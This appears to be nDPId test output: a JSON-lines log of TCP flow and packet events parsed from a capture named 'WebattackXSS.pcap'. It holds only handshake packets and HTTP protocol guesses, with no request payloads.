+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4678,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347528679,"flow_last_seen":1499347528679,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347528679,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4678,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":1,"flow_last_seen":1499347528679,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347528679,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86w9AAD4G2sCsEAABwKgKMuMuAFDPaODJAAAAAKACchC+UQAAAgQFtAQCCAoBOwvGAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4679,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":2,"flow_last_seen":1499347528679,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347528679,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4y4jZsPUz2jgyqAScSD21QAAAgQFtAQCCAoD5N07ATsLxgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4680,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":3,"flow_last_seen":1499347528680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347528680,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06xBAAD4G2sesEAABwKgKMuMuAFDPaODKI2bD1YAQAOWV3QAAAQEICgE7C8YD5N07"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4701,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347531303,"flow_last_seen":1499347531303,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347531303,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4701,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":1,"flow_last_seen":1499347531303,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347531303,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MvhAAD4GktisEAABwKgKMuNIAFARgDytAAAAAKACchAdrgAAAgQFtAQCCAoBOw5VAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":2,"flow_last_seen":1499347531303,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347531303,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ40hb80TSEYA8rqAScSCaFwAAAgQFtAQCCAoD5N\/LATsOVQEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4703,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":3,"flow_last_seen":1499347531304,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347531304,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MvlAAD4Gkt+sEAABwKgKMuNIAFARgDyuW\/NE04AQAOU5HgAAAQEICgE7DlYD5N\/L"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4713,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347532560,"flow_last_seen":1499347532560,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347532560,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4713,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":1,"flow_last_seen":1499347532560,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347532560,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ro1AAD4GF0OsEAABwKgKMuNWAFA1F6EdAAAAAKACchCUXQAAAgQFtAQCCAoBOw+QAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":2,"flow_last_seen":1499347532560,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347532560,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ41Zu3G2tNRehHqAScSDTyAAAAgQFtAQCCAoD5OEFATsPkAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4715,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":3,"flow_last_seen":1499347532561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347532561,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ro5AAD4GF0qsEAABwKgKMuNWAFA1F6EebtxtroAQAOVy0AAAAQEICgE7D5AD5OEF"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4734,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347535081,"flow_last_seen":1499347535081,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347535081,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4734,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":1,"flow_last_seen":1499347535081,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347535081,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vMpAAD4GCQasEAABwKgKMuNwAFAre67MAAAAAKACchCNugAAAgQFtAQCCAoBOxIGAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4735,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":2,"flow_last_seen":1499347535081,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347535081,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ43Bd+kT3K3uuzaAScSAESAAAAgQFtAQCCAoD5ON7ATsSBgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4736,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":3,"flow_last_seen":1499347535081,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347535081,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vMtAAD4GCQ2sEAABwKgKMuNwAFAre67NXfpE+IAQAOWjTwAAAQEICgE7EgYD5ON7"} +00575{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":4740,"source":"WebattackXSS.pcap","alias":"nDPId-test","packets-captured":4740,"packets-processed":4739,"total-skipped-flows":0,"total-l4-data-len":2075670,"total-not-detected-flows":0,"total-guessed-flows":242,"total-detected-flows":13,"total-detection-updates":0,"total-updates":0,"current-active-flows":82,"total-active-flows":334,"total-idle-flows":252,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1846,"global_ts_msec":1499347536104} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347536332,"flow_last_seen":1499347536332,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536332,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":1,"flow_last_seen":1499347536332,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347536332,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iGJAAD4GPW6sEAABwKgKMuN+AFBSPZtdAAAAAKACchB5IAAAAgQFtAQCCAoBOxM\/AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4744,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":2,"flow_last_seen":1499347536332,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347536332,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ434l0Xf0Uj2bXqAScSDzoAAAAgQFtAQCCAoD5OS0ATsTPwEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4745,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":3,"flow_last_seen":1499347536333,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347536333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iGNAAD4GPXWsEAABwKgKMuN+AFBSPZteJdF39YAQAOWSqAAAAQEICgE7Ez8D5OS0"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347400752,"flow_last_seen":1499347406726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56792,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347400752,"flow_last_seen":1499347406726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347403327,"flow_last_seen":1499347408726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56818,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347403327,"flow_last_seen":1499347408726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56818,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347404575,"flow_last_seen":1499347409726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56832,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347404575,"flow_last_seen":1499347409726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347407100,"flow_last_seen":1499347412728,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56858,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347407100,"flow_last_seen":1499347412728,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56858,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347408367,"flow_last_seen":1499347413728,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56872,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347408367,"flow_last_seen":1499347413728,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56872,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347409644,"flow_last_seen":1499347414728,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56886,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347409644,"flow_last_seen":1499347414728,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4755,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347537591,"flow_last_seen":1499347537591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347537591,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4755,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":1,"flow_last_seen":1499347537591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347537591,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UmRAAD4Gc2ysEAABwKgKMuOMAFC1fUYeAAAAAKACchBp1gAAAgQFtAQCCAoBOxR6AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4756,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":2,"flow_last_seen":1499347537591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347537591,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ44xyZUlKtX1GH6AScSDFMQAAAgQFtAQCCAoD5OXvATsUegEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4757,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":3,"flow_last_seen":1499347537592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347537592,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UmVAAD4Gc3OsEAABwKgKMuOMAFC1fUYfcmVJS4AQAOVkOQAAAQEICgE7FHoD5OXv"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4774,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347540145,"flow_last_seen":1499347540145,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347540145,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4774,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":1,"flow_last_seen":1499347540145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347540145,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8BSZAAD4GwKqsEAABwKgKMuOmAFDsIBPeAAAAAKACchBi2wAAAgQFtAQCCAoBOxb4AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4775,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":2,"flow_last_seen":1499347540145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347540145,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ46adBfH37CAT36AScSDoagAAAgQFtAQCCAoD5OhtATsW+AEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4776,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":3,"flow_last_seen":1499347540146,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347540146,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0BSdAAD4GwLGsEAABwKgKMuOmAFDsIBPfnQXx+IAQAOWHcgAAAQEICgE7FvgD5Oht"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4785,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347541398,"flow_last_seen":1499347541398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347541398,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4785,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":1,"flow_last_seen":1499347541398,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347541398,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WJdAAD4GbTmsEAABwKgKMuO0AFCKGUCmAAAAAKACchCW0wAAAgQFtAQCCAoBOxgxAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":2,"flow_last_seen":1499347541398,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347541398,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ47RdwzayihlAp6AScSAVsQAAAgQFtAQCCAoD5OmnATsYMQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4787,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":3,"flow_last_seen":1499347541399,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347541399,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WJhAAD4GbUCsEAABwKgKMuO0AFCKGUCnXcM2s4AQAOW0uAAAAQEICgE7GDED5Omn"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4797,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347542648,"flow_last_seen":1499347542648,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347542648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4797,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":1,"flow_last_seen":1499347542648,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347542648,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80V9AAD4G9HCsEAABwKgKMuPCAFCPt8g1AAAAAKACchAIXwAAAgQFtAQCCAoBOxlqAAAAAAEDAwc="} 
